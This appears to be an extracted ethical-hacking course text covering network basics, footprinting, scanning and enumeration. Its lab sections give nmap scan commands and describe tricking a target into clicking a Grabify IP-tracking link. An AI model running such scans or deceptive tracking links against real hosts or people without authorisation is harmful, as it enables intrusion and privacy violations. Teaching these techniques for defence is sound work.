Network Basics

Theory

Hacking with
 A network is a group of two or more computer systems or other devices
that are linked together to exchange data. In networks, computing devices
exchange data with each other using data links between nodes. These data links
are established with the help of cable media such as wires or wireless media
such as WiFi.

Network Components and Functions

Server: A computer or device on a network that manages network
resources. Servers are often dedicated, meaning that they perform no other tasks
besides their server tasks like accepts and responds to requests made by another
program, known as a client.
Client: A client is an application that runs on a personal computer or
workstation and relies on a server to perform some operations. The client
accesses the server by way of a network.
Devices: Computer devices, such as a CD-ROM drive or printer, that is
not part of the essential computer. Examples of devices include disk drives,
printers, and modems.
Hub: Hub is a network hardware device for connecting multiple devices
and making them act as a single network segment. A hub works at the physical
layer of the OSI model.
Switch: A device that filters and forwards packets between LAN
segments. Switches operate at the data link layer and sometimes the network
layer of the OSI Reference Model.
Router: A router is a device that is capable of forwarding data packets on
a network. Routers are placed at the junction (gateway) of two or more
networks connect. Routers use headers and forwarding tables to determine the
best path for forwarding the packets.
Bridge: Bridge is a computer networking device that connects a local
area network (LAN) to another local area network that uses the same protocol.
Access Point: A hardware device or a computer's software that acts as a
communication hub for users to connect all their wireless device.

Types of Networks

Local area network (LAN)

A LAN is a network that connects computers and devices in a limited
geographical area such as a home, school, office building.
Wide area network (WAN)
A WAN is a computer network that covers a large geographic area such
as a city, country, or spans even intercontinental distances. A WAN uses a
communications channel that combines many types of media such as telephone
lines, ethernet cables, optical fibers, etc.
Metropolitan Area Networks (MAN)
Metropolitan area Network covers a larger area than that of a LAN and
smaller area when compared to WAN. MANs rarely extend beyond 100 KM
and comprise a combination of different hardware and transmission media.
Wireless Local Area Network (WLAN)
Wireless local area networks provide wireless network communication
over short distances using radio or infrared signals instead of traditional
network cabling. WLANs are built by attaching a device called the access point
to the edge of the wired network. Clients communicate with the AP using a
wireless network adapter similar in function to a traditional Ethernet adapter.
Virtual private network (VPN)
The virtual private network is an overlay network in which some of the
links between nodes are carried by virtual circuits in the network instead of
physical wires. The data link layer protocols of the virtual network are said to
be tunneled through the network.
Personal Area Network (PAN)
A personal area network is a computer network organized around an
individual. Personal area networks typically involve mobile devices. Personal
area networks can be wired or wirelessly. These networks generally cover a
network range of 10 meters (about 30 feet).

OSI model
OSI (Open Systems Interconnection) is a reference model for how
applications communicate over a network. The main concept of OSI is that the
process of communication between two endpoints in a network can be divided
into seven distinct groups of related functions or layers. Each communicating
user or program is on a device that can provide those seven layers of function.
The seven Open Systems Interconnection layers are:
Layer 1: Physical Layer
This layer conveys the bit stream across the network either electrically,
mechanically or through radio waves. The physical layer covers a variety of
devices and mediums, among them cabling, connectors, receivers, transceivers,
and repeaters.
Layer 2: Data Link Layer
This layer sets up links across the physical network, putting packets into
network frames. This layer has two sublayers the logical link control layer and
the media access control layer (MAC). MAC layer types include Ethernet and
802.11 wireless specifications.
Layer 3: Network Layer
This layer handles addressing and routing the data. To transfer it from the
right source to the right destination. The IP address is part of the network layer.
Layer 4: Transport Layer
This layer manages packetization of data, then the delivery of the packets,
including checking for errors in the data once it arrives. On the internet, TCP
and UDP provide these services for most applications.
Layer 5: Session Layer
The session layer controls the connections between computers. It
establishes, manages and terminates the connections between the local and
remote application.
Layer 6: Presentation Layer
This layer is usually part of an operating system (OS) and converts
incoming and outgoing data from one presentation format to another for
example, from clear text to encrypted text at one end and back to clear text at
the other.
Layer 7: Application Layer
The application layer of the OSI model interacts with the end user.
Protocols at this layer handle the requests from different software applications.
If a web browser wants to download an image, an email client wants to check
the server, and a file-sharing program wants to upload a movie, the protocols in
the application layer will process those requests.

IP address
An Internet Protocol address (IP address) is a numerical label assigned to
each device connected to a computer network. IP address serves two purposes,
host or network interface identification and location addressing. Internet
Protocol version 4 (IPv4) defines an IP address as a 32-bit number and new
version of IP (IPv6), uses 128 bits for the IP address.
Private IP address: A private IP address is a non-Internet facing IP address.
Private IP addresses are provided by network devices, such as routers, using
network address translation (NAT).
Public IP address: A public IP address is an IP address that can be accessed
over the Internet. The public IP address is a globally unique IP address assigned
to a computing device.

IPv4: Internet Protocol Version 4 is the fourth revision of the Internet Protocol
used to identify devices on a network. IPv4 is the most widely deployed Internet
protocol used to connect devices to the Internet. IPv4 uses a 32-bit address
scheme allowing a total of 2^32 addresses.

IPv6: Internet Protocol Version 6 is the newest version of the Internet Protocol
reviewed in the IETF standards committees to replace the current version of
IPv4. IPv6 addresses are 128-bit IP address written in hexadecimal and
separated by colons. An example IPv6 address could be written like this 3ffe:
1900:4545:3:200: f8ff: fe21:67cf.

IP address classes
There are five classes of IP addresses, they are Class A, Class B, Class C, Class
D and Class E, where only A, B, and C are commonly used.

Class Address Range Supports

Class A 1.0.0.1 to Supports 16 million hosts on each
126.255.255.254 of 127 networks.

Class B 128.1.0.1 to Supports 65,000 hosts on each of

191.255.255.254 16,000 networks.
Class C 192.0.1.1 to Supports 254 hosts on each of 2
223.255.254.254 million networks.
Class D 224.0.0.0 to Reserved for multicast groups.
239.255.255.255
Class E 240.0.0.0 to Reserved for future use, or Research
254.255.255.254 and Development Purposes.

Subnetwork (Subnet)
A subnet is a logical subdivision of an IP network. Dividing a network
into two or more networks is known as subnetting. Computers that belong to a
subnet are addressed with a significant bit-group in their IP addresses.
Subnetting results in the logical division of an IP address into two parts, the
network address, and the host identifier.
Super network (Supernet)
Supernet is an Internet Protocol network that is formed, for combining
two or more networks into a larger network. The benefits of supernetting are
conservation of address space, gaining efficiency regarding memory storage and
route information processing.

Network address translation

Network address translation (NAT) is a method of remapping one IP
address space into another by modifying network address information in IP
header packets while they are in transit. It has become a popular and essential
tool in conserving global address space in the face of IPv4 address exhaustion.

Dynamic Host Configuration Protocol

The Dynamic Host Configuration Protocol (DHCP) is a network
management protocol used on UDP/IP networks. A DHCP server dynamically
assigns an IP address and other network configuration parameters to each
device on a network so that they can communicate with other IP networks.

TCP
TCP stands for Transmission Control Protocol, which is a widely used
protocol for data transmission over a network. TCP establishes a connection
between two hosts before transmitting data, to ensure that data transmitted over
the network reaches the destination without fail. TCP also known as a
connection-oriented protocol, establishes a reliable connection between sender
and receiver. TCP provides error and flow control mechanisms which help in
orderly transmission of data and retransmission of lost packets.

UDP
UDP stands for User Datagram Protocol, which is connectionless
protocol, mostly used for connections that can tolerate data loss. UDP is used by
applications on the internet that offer voice and video communications, which
can suffer some data loss without adversely affecting the quality. UDP does not
provide error and flow control mechanisms because of which it does not require
a connection to be established before transmitting data over the network.

ICMP
ICMP stands for Internet Control Message Protocol; this is widely used
for internet communication troubleshooting or generated in response to errors in
IP operations, this will send packets to the target machine and will see whether
the packets are delivered or not.
Address Resolution Protocol
Address Resolution Protocol (ARP) is a communication protocol used for
discovering the link layer address, such as a MAC address, associated with a
given network layer address. This mapping is a critical function in the Internet
Protocol suite. It works within the boundaries of a single network never routed
across internetworking nodes. ARP uses a simple message format containing
one address resolution request or response. The size of the ARP message
depends on the link layer and network layer address sizes.

Domain Name System

Domain Name System (DNS) is a naming system for resources connected
to the Internet or a private network. The DNS is responsible for assigning
domain names and mapping those names to Internet resources by designating
name servers for each domain. Network administrators have authority over the
subdomains of their allocated namespace to other name servers. Domain Name
System is an essential component of Internet functionality.

Internet Group Management Protocol

Internet Group Management Protocol (IGMP) is a communication
protocol used by hosts and adjacent routers on IPv4 networks to establish
multicast group memberships. IGMP is an integral part of IP multicast. IGMP
can be used for one-to-many networking applications such as online video
streaming and gaming and allows the more efficient use of resources.

Routing
Routing is the process of selecting a path for traffic in a network or across
multiple networks. In routing, network packets from their source toward their
destination are routed through intermediate network nodes by specific packet
forwarding mechanisms. Intermediate nodes are typically networked hardware
devices such as routers, bridges, gateways, firewalls, or switches. In routing,
process packets are directed on based on routing tables, which maintain a record
of the routes to various network destinations. An administrator specifies the
routing table.

Routing protocol
Routing protocol specifies how routers communicate with each other,
distributing information, which enables them to select routes between any two
nodes on a computer network. Routing algorithms determine to choose a
specific route. A routing protocol shares this information first among immediate
neighbors, and then throughout the network. The major types of routing
protocols.
● Routing Information Protocols (RIP)
 ● Interior Gateway Routing Protocol (IGRP)
● Open Shortest Path First (OSPF)
● Exterior Gateway Protocol (EGP)
● Enhanced Interior Gateway Routing Protocol (EIGRP)
● Border Gateway Protocol (BGP)
● Intermediate System-to-Intermediate System (IS-IS)

References:

1. Beal, V. (n.d.). Network Fundamentals Study Guide. Retrieved from

https://www.webopedia.com/quick_ref/network-fundamentals-study-
guide.html.
2. Beal, V. (n.d.). What is The Difference Between IPv6 and IPv4?
Retrieved from
https://www.webopedia.com/DidYouKnow/Internet/ipv6_ipv4_differenc
e.html.
3. What is OSI model (Open Systems Interconnection)? - Definition from
WhatIs.com. (n.d.). Retrieved from
https://searchnetworking.techtarget.com/definition/OSI
4. Image reference: 7 Layers of OSI Model and Their Functions. (2017,
November 05). Retrieved from http://electricala2z.com/cloud-
computing/osi-model-layers-7-layers-osi-model/
Introduction To
Ethical Hacking
Theory

Hacking with
Hacking
Hacking is the process of exploiting system vulnerabilities and
compromising security systems to gain unauthorized access to the system
resources. It involves modifying system or application features to achieve a goal
outside of the creator’s original purpose.

Ethical Hacking
Ethical Hacking is the process to identify vulnerabilities to assure system
security by use of hacking tools, tricks, and techniques. It focuses on simulating
methods used by attackers to verify the existence of exploitable vulnerabilities
in the system's security.

Hacker
Hackers are intelligent individuals who spend enormous amounts of time
exploring computing resources like networks, websites, mobile devices, etc.

Ethical Hacker
Ethical Hacker is an expert in computer internals and networking
concepts, who tries to find out potential vulnerabilities on the target systems
before a hacker could use, without actually doing any harm to the information
systems on behalf of the owners of the IT Assets.

Types of Hackers
Black Hat (Crackers): Individuals utilize computing skills for malicious
or destructive activities.
White Hat: Individuals utilizing hacking skills for the defensive purpose
Gray Hat: Individuals who work both offensively and defensively
Suicide Hackers: Hackers who aim to shut down the critical
infrastructure for a cause and are not worried about facing punishment.
Script Kiddies: An unskilled hacker who compromises the system by
running scripts, tools, and software developed by real hackers.
Cyber Terrorists: Individuals with hacking skills, motivated by religious
or political beliefs to create fear by large-scale disruption of computer networks.
Hacktivist: Hackers who promote a political agenda by hacking,
especially by defacing or disabling websites.
Government Sponsored: Individuals employed by the government to
penetrate and gain confidential information.
Why Ethical Hacking is Necessary
Ethical Hacker needs to think like malicious Hacker. Ethical hacking is
necessary to defend against malicious hackers attempts, by anticipating methods
they can use to break into a system.
● To fight against cyber crimes.
● To protect information from getting into wrong hands.
● To build a defensive mechanism that avoids hackers from penetrating.
● To test the organization’s infrastructure security.

Steps to Perform Ethical Hacking

1. Reconnaissance refers to the pre-attack phase where an attacker observes a
target before launching an attack. It may include the target organization's
clients, employees, operations, network, and systems
2. Scanning is the phase immediately preceding the attack. Here, the attacker
uses the details gathered during reconnaissance to identify specific
vulnerabilities. An attacker can gather critical network information such as
the mapping of systems, routers, and firewalls by using simple tools such as
the standard Windows utility Traceroute.
3. Gaining Access In this phase in which real hacking occurs. Attackers use
vulnerabilities identified during the reconnaissance and scanning phase to
gain access to the target system or network. Attackers gain access to the
target system locally, over a LAN, or over the Internet.
4. Maintaining Access of the target machine and remain undetected. Attackers
install a backdoor or a Trojan to gain repeat access. They can also install
rootkits at the kernel level to gain full administrative access to the target
computer. Rootkits are used to gain access at the operating system level,
while a Trojan horse gains access at the application level. Both rootkits and
Trojans require users to install them locally.
5. Clearing Tracks is for avoiding legal trouble, attackers will overwrite the
server, System and application logs to Avoid suspicion and erase all
evidence of their actions. Attackers can execute scripts in the Trojan or
rootkit to replace the critical system and log files to hide their presence in the
system.

Terminology
Vulnerability: In simple words, vulnerability is a loophole, Limitation, or
weakness that becomes a source for an attacker to enter into the system.
Exploit: It is a software tool designed to take advantage of a flaw
(vulnerability) in a system for malicious purposes.
Payload: A payload is an action, or set of operations has to be done on the
target, once the exploit successfully launched. It can be any control or Denial of
service, etc.
Hack value: Hack value is a notion among the hackers that something is worth
doing. Hackers may feel that breaking down robust network security might give
them great satisfaction and that it is something they accomplished that not
everyone could do.
Zero-day attack: In a 0-day attack, the attacker exploits the vulnerability
before the software developer releases the Patch For them.

What is Information Security

Information security, sometimes shortened to InfoSec, is the practice of
preventing unauthorized access, disclosure, disruption, destruction,
modification, inspection, recording or destruction of information.
Information security's primary focus is the balanced protection of the
confidentiality, integrity, and availability of data and focuses on efficient policy
implementation, organization productivity.

Elements of Information Security

Information Security is a state of well-being of information and
infrastructure in which the possibility of theft, tampering, and disruption of
information and services is kept low or tolerable.
● Confidentiality ● Non-Repudiation
● Authenticity ● Authorization
● Integrity ● Availability

The Security, Functionality and Usability Triangle

The strength of these three components can define the level of Security in
any system.
Requirements to run Kali Linux on the Host machine
Hardware:
● Minimum 4/8 GB RAM
● AMD2016 Model / intel core i3/i5/i7 processor
● Minimum 80 GB Hard disk
● Minimum 15 Mbps internet speed
Software
● Virtual box software
● Kali Linux virtual machine image file (.ova)
● Metasploitable 2 virtual machine

Useful Links Source: Internet

Security and vulnerability Research Websites:
● Securityfocus.com
● Secunia.com
● Packetstormsecurity.com
● Governmentsecurity.org

Exploit Research Websites:

● Exploit-db.com
● Corelan.be
● 1337day.com

Hacking Conferences:
● Defcon Conference ● Nullcon Conference
● Shmoocon Conference ● Malcon Conference
● Blackhat Conference ● Club hack Conference

Hacking Forum Sites:

● Hackforums.net ● Irongeek.com
● Alboraaq.com ● Forum.tuts4you.com
● Hackhound.org ● Ic0de.org( ic”Zero”de.org )
● Garage4hackers.com

Hacking Magazines:
● Phrack.org
● hackin9.org
● 2600.Com
● Magazine.hitb.com
● Pentest magazine
● Hack
● ers5.com
● Club hack Magazine chmag.in
Footprinting and
Reconnaissance
Theory

Hacking with
Footprinting
Footprinting is the process of collecting information related to the target
network. Footprinting helps in identifying Various ways to intrude into an
Organization’s network system.
In this step attacker tries to gather publicly available sensitive
information, using which he/she can carry out social engineering, perform
system or network level attacks, that can cause substantial financial loss or
damage the reputation of an individual or organization. This step helps an
attacker in gaining a basic idea of network structure and organization’s
infrastructure details.

Why perform Footprinting

● Footprinting is the first step of the attacking process. Hackers use to
gather information about the target environment, usually to find ways to
break into that environment.
● Footprinting allows an attacker to know about the security posture of an
organization.
● It helps in reducing attacker’s attack surface to a specific range of IP
address, networks, domain name, remote access, etc.
● It allows an attacker to build their information database about the target’s
organization security weakness and plan attacks accordingly.

Terminology
Passive Information Gathering: Is the process of collecting information
about the target from the publicly accessible resources
Active Information Gathering: Is the process of gather information
about the target by using techniques likes social engineering, grabbing
information by visiting personal blogs or websites, or through direct interaction
with the individual or employees of the organization.

What kind of information is needed

Network Information:
Domain name, Network blocks, IP address of computers in the target
network, TCP and UDP services running, details related to IDS running.
System Information:
User and group names, system banners, routing tables information,
system architecture, remote system names.
Organization Information:
Employee details, organization website details, location details, address
and phone numbers, information related to security policies implemented, and
any non-technical information about the organization.
How to perform Footprinting
● Through search engines
● Through social networking sites
● Through official websites
● Direct communication with the target
● Through job portals
● Through DNS enumeration

Google Hacking
Google is a vast resource where millions of pages are available for an
average user to search. But getting useful information out of those results is a
challenging task, to extract the desired information (information that is useful to
attack target individual or network) we can take help of Google search operators
also known as google dorks. This technique is called Google Hacking.
By using these google dorks, we query Google to reveal sensitive data,
useful for the reconnaissance stage of an attack, sensitive data such as emails
associated with an individual or an organization, database files with usernames
and passwords, unprotected directories with confidential documents, URLs to
login portals, different types of system logs such as firewall and access logs etc.,

whois lookup
While purchasing a domain, the user (registrant) has to provide their
contact details, like address, phone number, email id, etc., those registration
details along with domain validity information is usually stored in a publicly
available database called whois database.
Domain registrars will protect this information from not to be published
on the internet based on the request made by users, at extra cost. Domain
registration details will not be available on the internet if they opt domain
privacy, of course, domain registrar information will be available, whoever
wants to get that domain information should contact the registrar, and if the
registrar finds the query is legitimate, they will provide the Domain registrant
details. By using the free online and offline tools, we extract domain registrant
Information from publicly available Whois database. This process is known as
whois lookup.

Traceroute
While the data packet is in transit, it passes through multiple network
nodes to reach the destination. If the data packet fails to reach the destination,
the user will not know the reason behind the failure; network administrators use
traceroute program to trace the packet from source to destination to identify the
actual cause of the problem so that they can investigate and resolve the issue.
Traceroute tool is used to extract details about the path that a packet takes
from the source to a specific destination.
IP Tracing
The IP address is one of the most critical pieces of information. To attack
the target computer, attackers need to identify the IP address of the target
computer. Attackers use different techniques to grab the IP address. Sending
tracking emails, or SMS, or some malicious links to grab the IP address of the
target computer is called as IP Tracing. In other words, extracting user details
(like location) based on IP address is known as IP Tracing or IP Lookup.

What if We Skip Footprinting?

We should not skip Footprinting. Hacker or penetration tester’s success
will not always depend on sophisticated tools used to perform attacks, but
information gathered at Footprinting plays a crucial role in gaining access to the
target. Want to know how?
Scenario: Information gathered in this step can help us bypass some security
controls for example login credentials for one of the computers in the network
may be DOB or first name of the employee. As we know some necessary
information about an employee, we can try to guess the username or password
by observing hint.
Conclusion: launching attacks without proper knowledge about the target may
affect the success of the attack.

Countermeasures
● Revise the information before publishing on blogs, social networking
sites, and websites.
● Never upload highly classified documents online.
● Privatize the who is lookup registration details by applying for
anonymous registration with the web hosting service provider.
● Never click the link in emails or mobiles, if received from an unknown
sender.
● Use pseudo-names in blogs and social networking sites to not leak
personal information.
● Avoid opening third-party social networking sites or websites from office
premises.
● Use IDS in corporate networks to detect Footprinting attacks done by
hackers.
Footprinting and
Reconnaissance
Lab Manual

Hacking with
 INDEX
S. No. Practical Name Page No.
1 Finding domain registration details with Whois tool 1
2 Extracting Emails and subdomains details using the harvester 2
3 To find out targets IP address using IP tracking technique 3
4 Footprinting domain using Recon-ng tool 5
5 Google Dorks 7
 Practical 1: Finding domain registration details with Whois tool
WHOIS is used to gather information related to the domain name and DNS details of the target.
Enter the following command to perform Whois operation on target. In this case, we are
targeting hackerschool.in

Page | 1
 Practical 2: Extracting Emails and subdomains details using the harvester
This tool is to gather emails, subdomains, hosts, employee names, open ports and banners from
different public sources like Google, Bing and other search engines.

Page | 2
 Practical 3: To find out targets IP address using IP tracking technique.
Visit Grabify IP logging website https://grabify.link/
This website creates a tracking link which helps in identifying targets IP address. To perform this
task, we are trying to convince our target to click on it tracking link that redirects target towards
a youtube video. Create an IP tracking link by using grabify website; it requires valid URL (In this
case we are converting youtube video link as an IP tracking link)

After clicking on Create URL button, the website generates IP tracking URL displayed in New
URL section, which you can share with a target to grab IP address.

Page | 3
If the target click on the link, the target’s IP address will be displayed on the same page as
shown below

Page | 4
 Practical 4: Footprinting domain using Recon-ng tool
To launch the recon-ng tool, execute the following command in terminal

Execute the below command, to list out the modules.

To use a module, Execute the following command

Execute the show options command, to view the list of options.

Page | 5
Execute set SOURCE <domain name> command, to set the domain address as a source
Example: set SOURCE juggyboy.com

Execute the run command, to start the search for domains

Page | 6
 Practical 5: Google Dorks
Google dorks are used to retrieving web pages that contain a specific term.
1. If you search for intitle:"Index of/" on google search bar, it will display those pages that
contain the term "Index of/" in the title of the website.

2. inurl: certifiedhacker will result in displaying those pages that contain the term
"certifiedhacker" in the URL.

Page | 7
3. To find out files of a specific format, we can use filetype: followed by file type (pdf, docx,
xlsx) and keyword.
For example, filetype:docx hacker will display all word documents that contain word
hacker.

4. site: certifiedhacker.com will display the results that contain the term "certifiedhacker"
in the website URL.

Page | 8
 5. allintitle: trojan definition will return results that contain words trojan and definition in
web page titles.

Refer following web pages for advanced Google operators

http://www.googleguide.com/advanced_operators_reference.html
http://www.exploit-db.com

Page | 9
Scanning Networks
Theory

Hacking with
Scanning
Scanning is a process of identifying network and service related
information by communicating with the target. Scanning helps in identifying
IP/Hostnames, Ports, Services running on ports, Live hosts, Vulnerable services
running on the target network.

Types of Scanning
● Network Scanning – Identifying the number of computers on the
network.
○ Ping Sweep
○ Arp Scan
● Port Scanning – Listing open ports and services running on those ports.
○ SYN Scan/Stealth Scan/Half-Open Scan
○ TCP Connect Scan
○ ACK Scan/Firewall Detection Scan
○ XMAS Scan
○ FIN Scan
○ NULL Scan
○ OS Detection Scan
○ Script Scan
○ UDP Scan
○ Service Detection Scan

Network Scanning
During the network scanning process, attackers gather a list of IP
addresses of computers that are live on the target network. The job of the
attacker will be easy if he/she can analyze the network structure and services
running on each machine.
List of Network Scanners
● Angry IP Scanner
● Advanced IP Scanner
● Netdiscover
● Autoscan
● hping3
● Nmap

What Are Ports and Port Numbers

Ports are virtual entry points to any digital device; devices can
communicate with one to another using port, there are virtually 65535 ports
available in every device, those can be identified with port numbers, ranging
from 0 to 65535.
 0 1023 Well known ports
1024 49135 Random ports
49136 65535 Experimental ports

Port Scanning
Port scanning is a technique where the attacker will send communication
probes to targets to see how the target is responding to them, based on the
response attacker will determine what ports are open and several other port
details, like service running on the port numbers, and OS the target is running.
List of Port scanners
● Nmap
● SuperScan
● Strobe
● Zenmap (Available for Windows Also)

Few Well-Known Ports

Application Port Number(s) Application Port Number(s)

FTP 20–21 DNS 53

Telnet 23 IRC 194
SMTP 25 POP3 110
DNS 53 SNMP 161
HTTP 80 HTTPS 443
SSH 22 NetBIOS 139
TFTP 69 SQL 156
For details on other port numbers and services refer RFC-1700

ICMP
ICMP stands for Internet Control Messaging Protocol; this is widely used
for internet communication troubleshooting or to generate errors related to IP
operations, this will send packets to the target machine and will see whether the
packets are delivered or not.

Live Host identification scan

Identifying the turned-on computers by sending ICMP packets or ARP
packets or some other kind of packets is called Live Host Identification Scan.
TCP
Transmission Control Protocol (TCP), which is a widely used protocol
for data transmission over a network. This protocol establishes a reliable
connection between two hosts before transmitting data, to ensure that data
transmitted over the network reaches the destination without fail. TCP also
known as a connection-oriented protocol, establishes a reliable connection
between sender and receiver. TCP provides error and flow control mechanisms
which help in orderly transmission of data and retransmission of lost packets.

UDP
UDP stands for User Datagram Protocol, which is connectionless
protocol, mostly used for connections that can tolerate data loss. UDP is used by
applications on the internet that offer voice and video communications, which
can suffer some data loss without adversely affecting the quality. UDP does not
provide error and flow control mechanisms because of which it does not require
a connection before transmitting data over the network.

TCP 3-way Handshake

To start a proper TCP conversation, the sender and receiver perform 3-
way handshake before exchanging data over the network. It is a process used by
two hosts to agree upon some protocol stack to start sharing data. Following
image represents the process of 3-way handshake.

TCP COMMUNICATION FLAGS

1. SYN (Synchronize): SYN flags will be used to initiate a data transfer of
the start of a communication process.
2. ACK (Acknowledgement): ACK flags will be used to send the receipt of
successful packet transmission.
3. FIN (Finish): FIN flags will be used to close or finish an existed packet
transmission. No more packets to be received.
4. RST (Reset): RST flags will be used to terminate or reset a connection.
5. URG (Urgent): Data in this flagged packet should be processed
immediately.
6. PSH (Push): Sends all buffered data immediately.
TCP Connect Scan / Full Open Scan
Nmap directly communicates with the operating system to establish a
connection with the target machine and port by issuing the connect system call.

SYN Scan / Half-Open Scan / Stealth Scan

SYN scan is the most popular scan option. It can scan thousands of ports
in a short period on a fast network not hampered by restrictive firewalls.
ACK Scan/Firewall Detection
This scan is different from others scanning operations discussed before; it
never determines open ports. It is used to identify firewall rules, determining the
type of firewall and identify filtered ports.

XMAS Scan
The Xmas-Tree scan sends a TCP packet with the following flags:
URG — Indicates that the data is urgent and should be processed immediately
PSH — Forces data to a buffer
FIN — Used when finishing a TCP session
FIN Scan
FIN scan, which attempts to close a connection that isn't open. The
operating system generates an error if service is not running on target port. If a
service is listening, the operating system will silently drop the incoming packet.
Therefore, no response indicates a listening service at the port.

NULL Scan
A data packet with zero flag values will be sent to a TCP port. (In a
regular TCP communication, at least one bit or flag is set). In TCP connect /
SYN scans, a response indicates an open port, but in a NULL scan, a response
indicates a closed port.
Importance of Scanning
Scanning will provide an exact outline of the network structure of the
target workspace. It is beneficial for hacking target servers or individual
computers. Scanning will provide a blueprint of entire network and details about
devices running on the network, information related to network topology and
helps in deciding what operating system is running on target computers.

Countermeasures
● Block ICMP and UDP inbound.
● Disable unused ports with support of policy settings.
● Block internal IP addresses from coming inbound.
● Change system and application banners to counter software detection
attacks.
● Always use a genuine operating system, update it frequently.
● Use IDS & IPS to detect and prevent attacks.
● Use “duckduckgo” or “StartPage” search engine to protect privacy.
Scanning Networks
Lab Manual

Hacking with
 INDEX
S. No. Practical Name Page No.
1 Network Scanning with Angry IP Scanner 1
2 Network Scanning with fping 6
3 Network Scanning With netdiscover 7
4 Ping Sweeping with nmap 8
5 Port Scanning with nmap 9
 Practical 1: Network Scanning with Angry IP Scanner

To download Angry IP scanner, visit following link https://angryip.org/download/

And download a suitable package, for Kali Linux download .deb package (based on your installation
32 bit or 64bit)

Save the file if it is asking

Then open a terminal and go to Downloads location (/root/Downloads/)

Page | 1
we can see the downloaded file in the Downloads directory; we can install it by executing the
following command

After installation, search for Angry IP scanner in installed applications and start Angry IP scanner.
The application looks as shown below. Follow the steps to perform scanning and discover devices.

Page | 2
Page | 3
Page | 4
Export the scan results to a text file. We can use this output file to feed it to another VA tools or
port scanner tools.

Page | 5
 Practical 2: Network Scanning with fping

Fping is a tool that can scan a range of IP addresses and identify some hosts that are up and
running in the given range.

Page | 6
 Practical 3: Network Scanning With netdiscover

In kali linux terminal type the following command netdiscover –i <interface name>
for example: netdiscover –i eth0

Page | 7
 Practical 4: Ping Sweeping with nmap

In Kali Linux terminal type the following command

nmap –sn 192.168.1.1/24

Page | 8
 Practical 5: Port Scanning with nmap

1.Regular Scan (SYN stealth scan or half open scan):

nmap <target IP or domain>
Ex: nmap 192.168.0.137
nmap –sS example.com
nmap –sS 192.168.0.137
nmap –sS example.com

Note: Even if we take a domain name, nmap will not scan the website, it will scan the computer
(server) hosting that website.

Page | 9
2. TCP connect scan (Full Connect Scan):
nmap –sT <target IP or domain>
Example: nmap –sT example.com
nmap –sT 192.168.0.137

If you get any error saying host may be down or disabled ICMP try adding –Pn to the command
Example: nmap –sT –Pn example.com
3. Service Detection scan or Version Detection scan:
Example: nmap –sV example.com
nmap –sV 192.168.0.137

Page | 10
4. OS Detection Scan:
nmap –O <target IP or domain>
Example: nmap –O example.com
nmap –O 192.168.0.137

5. FIN scan (FIN Flag):

nmap –sF <target IP or domain>
Example: nmap –sF example.com
nmap –sF 192.168.0.137 –v

Page | 11
6. XMAS scan (FIN, PSH, URG Flags):
nmap –sX <target IP or domain>
Ex: nmap –sX example.com
nmap –sX 192.168.0.137 –v

7. NULL scan (No Flags)

nmap –sN <target IP or domain>
Ex: nmap –sN example.com
nmap –sN 192.168.0.137 –v

Page | 12
8. Aggressive scan:
nmap –A <target IP of domain>
Ex: nmap –A example.com
nmap –A 192.168.0.137 –v
You can add –v at the end of any command to see the verbose (in detailed) information

9. UDP port scan:

nmap –sU <target IP or domain>
Example: nmap –sU example.com
nmap –sU 192.168.0.137

Page | 13
10. Custom port scanning:
nmap –p <port range> <target IP or domain>
Ex: nmap –p 80 example.com
nmap 192.168.0.137 –p 80-85
nmap 49.204.90.43 –p 80,81,85,21,443

Page | 14
11. traceroute scan with nmap
nmap --traceroute <target IP or domain>
Ex: nmap --traceroute example.com
nmap --traceroute 192.168.0.137 –v

Page | 15
Enumeration
Theory

Hacking with
Enumeration
Enumeration is the process of establishing an active connection to the
target host to discover potential attack vectors in the computer system,
information gained at this phase can be used for further exploitation of the
system. It is often considered as a critical phase because few pieces of
information gathered in this phase can help us directly exploit the target
computer.
Information gathered in this phase
1. Usernames, Group names
2. Hostnames
3. Network shares and services
4. IPtables and routing tables
5. Service settings and Audit configurations
6. Application and banners
7. SNMP and DNS Details

NetBIOS enumeration
NetBIOS stands for Network Basic Input Output System. It allows
computers to communicate over a LAN to share files and devices like printers.
NetBIOS names are used to identify network devices over TCP/IP.

NetBIOS Name List:

Name NetBIOS NetBIOS Information Obtained
code code
<host name> <00> UNIQUE Hostname

<domain> <00> GROUP Domain name

<host name> <03> UNIQUE Messenger service running for that

computer
<user name> <03> UNIQUE Messenger service running for that
individual logged-in user
<host name> <20> UNIQUE Server service running
<domain> <1D> GROUP Master browser name for the
subnet
<domain> <1B> UNIQUE Domain master browser name,
identifies the PDC for that domain
Benefits of NetBIOS Enumeration:
1. Information related to computers that belong to a domain.
2. Details related to shares on computers in the network.
3. Extracting policies and passwords.

SMB Enumeration
SMB stands for Server Message Block. It is mainly used for providing
shared access to files, printers and miscellaneous communications between
nodes on a network. It also provides an authenticated inter-process
communication mechanism.

DNS Enumeration
DNS enumeration retrieves information regarding all the DNS servers
and their corresponding records related to an organization. DNS enumeration
will yield usernames, computer names, and IP addresses of potential target
systems.

DNS - Domain Name Servers

The Internet equivalent of the phone book. They maintain the directory of
domain names & translate them to internet protocol addresses.

DNS Records
The list of DNS records provides an overview of types of resource
records stored in the zone files of the domain name system. The DNS
implements a distributed, hierarchical and redundant database for information
associated with internet domain names & addresses.

DNS record types and their uses

-A (Address) maps hostnames to IPv4 address.

-SOA (Start of Authority) identifies the DNS server responsible for the domain
information.
-CNAME (Canonical Name) Provides additional names or aliases for the address.

-AAAA (Address) maps hostnames to IPv6 address.

-MX (Mail exchange) Identifies the mail server for the domain

-SRV (Service) Identifies services such as directory services

 -PTR (Pointer) Maps IP address to hostnames

-NS (Nameserver) Identifies other name servers for the domain

DNS Zone Transfer

 Used to replicate DNS data across some DNS Servers or to backup DNS
files. A user or server will perform a specific zone transfer request from a
name server.
 DNS servers should not permit zone transfers towards any IP address
from the Internet.
 Since zone files contain complete information about domain names,
subdomains and IP addresses configured on the target name server,
finding this information is useful for increasing your attack surface and
for better understanding the internal structure of the target company.
 We can identify hidden subdomains, development servers information,
and internal IP addresses, etc.
 Information gathered from zone files can be useful for attackers to
implement various attacks against the target company, like targeting test
or development servers which are less secure.

NTP Enumeration
NTP (Network Time Protocol) utilizes UDP port 123. Through NTP
enumeration you can gather information such as a list of hosts connected to
NTP server, IP addresses, system names, and operating systems running on the
client system in a network. All this information can be enumerated by querying
the server.

SNMP Enumeration
Simple Network Management Protocol is an application layer protocol
